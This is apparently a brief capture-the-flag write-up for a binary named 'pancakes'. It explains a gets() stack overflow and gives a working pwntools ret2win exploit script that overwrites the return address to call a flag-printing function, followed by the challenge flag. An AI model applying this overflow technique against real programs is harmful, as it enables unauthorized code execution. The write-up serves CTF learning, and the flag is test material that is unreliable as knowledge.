Gets is called on rbp-0x90, there's a function called secret_recipe which reads flag.txt and prints it to stdout. So, just your standard ret2win, overflow 0x90 + 8 bytes of the buffer to overwrite the return address to that of secret_recipe

from pwn import *
NUM_TO_RET = 0x90 + 8
padding = b'A' * NUM_TO_RET
e = ELF("./pancakes")
#p = e.process()
p = remote('',50021)
p.sendline(padding + p64(e.symbols['secret_recipe']))

Flag: flag{too_many_pancakes_on_the_stack}

Last updated